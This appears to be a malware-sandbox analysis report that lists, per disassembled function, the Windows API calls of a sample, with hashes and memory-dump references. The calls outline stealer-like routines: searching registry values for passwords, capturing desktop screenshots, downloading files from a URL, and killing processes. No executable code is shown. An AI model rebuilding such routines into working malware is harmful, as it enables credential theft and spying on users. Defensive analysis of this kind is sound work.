                                • Opcode ID: d8642fd4943c22b9cc7845cba88ec7072c3e2f272ffe3b104ec7e6b651a952c4
                                • Instruction ID: 31b13c17a52f6486208602c1b0b70f38a3c1ee0daf5360d8739a593a32320842
                                • Opcode Fuzzy Hash: d8642fd4943c22b9cc7845cba88ec7072c3e2f272ffe3b104ec7e6b651a952c4
                                • Instruction Fuzzy Hash: F451B23191021A9FEB72EF78DC49ABE7BE4AF51304F044158FA85DB296DB78DC01A790
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(00D68A10,01229BD8,0000FFFF), ref: 00FFA026
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFA053
                                • lstrlen.KERNEL32(01229BD8), ref: 00FFA060
                                • lstrcpy.KERNEL32(00000000,01229BD8), ref: 00FFA08A
                                • lstrlen.KERNEL32(01024C4C), ref: 00FFA095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFA0B2
                                • lstrcat.KERNEL32(00000000,01024C4C), ref: 00FFA0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFA0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFA0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFA114
                                • SetEnvironmentVariableA.KERNEL32(00D68A10,00000000), ref: 00FFA12F
                                • LoadLibraryA.KERNEL32(00D56738), ref: 00FFA143
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: fb2925be5261277599a54544ad9003485cd359b19ca333f3b27e1a09d24aac83
                                • Instruction ID: ce42d82549aec54a952932cce12a13a38e903f42d5c1bd595a91c0020c29eb7a
                                • Opcode Fuzzy Hash: fb2925be5261277599a54544ad9003485cd359b19ca333f3b27e1a09d24aac83
                                • Instruction Fuzzy Hash: DE9118B0A00618AFD7309FA4EC48A7A37F9EF54714F454018F7098B265EBB9DC40EB92
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100C8A2
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100C8D1
                                • lstrlen.KERNEL32(00000000), ref: 0100C8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100C932
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 0100C943
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 55450b1f0b708b28ba90aa4573f67548a1f62d037749dd6f2e7acb5e2e82bbd1
                                • Instruction ID: 4513869eb5de420c5f0981a87675bcde50da0fc3037cb35d7da6a85e2db72efd
                                • Opcode Fuzzy Hash: 55450b1f0b708b28ba90aa4573f67548a1f62d037749dd6f2e7acb5e2e82bbd1
                                • Instruction Fuzzy Hash: B261E871D002259BFF62DF79CD49AAE7BF8AF05304F1002E9E981E7291D7788945CB90
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,01010CF0), ref: 01014276
                                • GetDesktopWindow.USER32 ref: 01014280
                                • GetWindowRect.USER32(00000000,?), ref: 0101428D
                                • SelectObject.GDI32(00000000,00000000), ref: 010142BF
                                • GetHGlobalFromStream.COMBASE(01010CF0,?), ref: 01014336
                                • GlobalLock.KERNEL32(?), ref: 01014340
                                • GlobalSize.KERNEL32(?), ref: 0101434D
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 486af18a3e3a34dbb98894b81941666d53779f61a79df93a350b0893ccb3d17f
                                • Instruction ID: b811ed04ec0bde76be4f21c7b278b81ddf8afbb039556de6ed67c5347b6ae970
                                • Opcode Fuzzy Hash: 486af18a3e3a34dbb98894b81941666d53779f61a79df93a350b0893ccb3d17f
                                • Instruction Fuzzy Hash: 8E512F75910218AFDB20DFA4EC89EEE77B9EF48304F105419FA05E3254DB78AE419BA0
                                APIs
                                • lstrcat.KERNEL32(?,00D6EEB0), ref: 0100E00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100E037
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E07D
                                • lstrcat.KERNEL32(?,?), ref: 0100E098
                                • lstrcat.KERNEL32(?,?), ref: 0100E0AC
                                • lstrcat.KERNEL32(?,00D5A488), ref: 0100E0C0
                                • lstrcat.KERNEL32(?,?), ref: 0100E0D4
                                • lstrcat.KERNEL32(?,00D6D970), ref: 0100E0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 0100E126
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: c8e887be412ee5f4cc44058b0049a7080daaaf1cfbaabe3076c3541709539100
                                • Instruction ID: ee48101f30e590d5fa73744aad500b14b4ff89ad5d4e42a21060d7fad8fee9ef
                                • Opcode Fuzzy Hash: c8e887be412ee5f4cc44058b0049a7080daaaf1cfbaabe3076c3541709539100
                                • Instruction Fuzzy Hash: 1F61807191011CEBDB65DF64DC48AEDB7B8BF48300F1049A8F649A3294DB749F859F90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF6AFF
                                • InternetOpenA.WININET(0101CFEC,00000001,00000000,00000000,00000000), ref: 00FF6B2C
                                • StrCmpCA.SHLWAPI(?,00D6F3C8), ref: 00FF6B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00FF6B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FF6B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00FF6BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00FF6BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00FF6BF0
                                • CloseHandle.KERNEL32(00000000), ref: 00FF6C10
                                • InternetCloseHandle.WININET(00000000), ref: 00FF6C17
                                • InternetCloseHandle.WININET(?), ref: 00FF6C21
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 6d307af321f1e76c1b852cc42611ce657d8cff559f8f571232c5202f28b0c99d
                                • Instruction ID: 2f9cff1f4a2e2cc0fc50a059e5a8e7f4190528fc609fdbb3d228f4ff4be2357f
                                • Opcode Fuzzy Hash: 6d307af321f1e76c1b852cc42611ce657d8cff559f8f571232c5202f28b0c99d
                                • Instruction Fuzzy Hash: 97417E71A00219BBEB30DE64EC49FAE77A8AF44705F404554FB05E7294EF74AE409BA4
                                APIs
                                • memset.MSVCRT ref: 0101451A
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,01004F39), ref: 01014545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0101454C
                                • wsprintfW.USER32 ref: 0101455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 010145CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 010145D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 010145E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID: 9O$%hs
                                • API String ID: 3729781310-3040109702
                                • Opcode ID: 7ebc454a3ff17439d3d2327d78369e5867186b6f8fbc3769f03b36e4198fdb8b
                                • Instruction ID: 7a9db82318e5db5cf8dedb0a8fc6504a29658fb7bfeee62029ca966a68f87006
                                • Opcode Fuzzy Hash: 7ebc454a3ff17439d3d2327d78369e5867186b6f8fbc3769f03b36e4198fdb8b
                                • Instruction Fuzzy Hash: B6316D72A00219BBEB30DFA4EC89FDE77B8BF44700F104055FA05E7188DB78A6458BA5
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFBC1F
                                • lstrlen.KERNEL32(00000000), ref: 00FFBC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFBC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFBC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFBCAC
                                • lstrlen.KERNEL32(01024AD4), ref: 00FFBD23
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 2752568c7b1e489ed4755b3e154203188b341fc326c40053802a7a45d9cb44de
                                • Instruction ID: 6d867105b2a9789da60d390825ca18f298460ca22d53063e78e193f8649c3259
                                • Opcode Fuzzy Hash: 2752568c7b1e489ed4755b3e154203188b341fc326c40053802a7a45d9cb44de
                                • Instruction Fuzzy Hash: 2EA18D30A012099FCB75EF28E949ABEB7F4AF44314F188069E609DB271DB79DC41EB51
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 01015F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 01015F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 01016014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 0101609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 010160D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: 3276ba597359758ca6cfd880c2baae03c34359db39af7e04217cc6a97f9879ef
                                • Instruction ID: 27f6b29367600981a2ccdb9ce30529598abc24e7fff0377a114e87f1fd5752ce
                                • Opcode Fuzzy Hash: 3276ba597359758ca6cfd880c2baae03c34359db39af7e04217cc6a97f9879ef
                                • Instruction Fuzzy Hash: 45619E70700104DBDB29CF5CCC949AEB7B6EF85314B284A4DF5D28B389D77AAD808B94
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E07D
                                • lstrcat.KERNEL32(?,?), ref: 0100E098
                                • lstrcat.KERNEL32(?,?), ref: 0100E0AC
                                • lstrcat.KERNEL32(?,00D5A488), ref: 0100E0C0
                                • lstrcat.KERNEL32(?,?), ref: 0100E0D4
                                • lstrcat.KERNEL32(?,00D6D970), ref: 0100E0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 0100E126
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: aa3fd8230858481b7020697050519bcba2b6f6d81c792a2ea1b5c45d436d1375
                                • Instruction ID: f218345762850b45fc92f14ecf75021f1c9b2f5647b54e6bdae3ddb57d1dc3c1
                                • Opcode Fuzzy Hash: aa3fd8230858481b7020697050519bcba2b6f6d81c792a2ea1b5c45d436d1375
                                • Instruction Fuzzy Hash: B4419D3191012CABDB72EF64DC48AED77B4BF48300F0049A4F64AA3291DB789F859F90
                                APIs
                                  • Part of subcall function 00FF77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FF7805
                                  • Part of subcall function 00FF77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00FF784A
                                  • Part of subcall function 00FF77D0: StrStrA.SHLWAPI(?,Password), ref: 00FF78B8
                                  • Part of subcall function 00FF77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FF78EC
                                  • Part of subcall function 00FF77D0: HeapFree.KERNEL32(00000000), ref: 00FF78F3
                                • lstrcat.KERNEL32(00000000,01024AD4), ref: 00FF7A90
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF7ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 00FF7ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF7AF0
                                • wsprintfA.USER32 ref: 00FF7B10
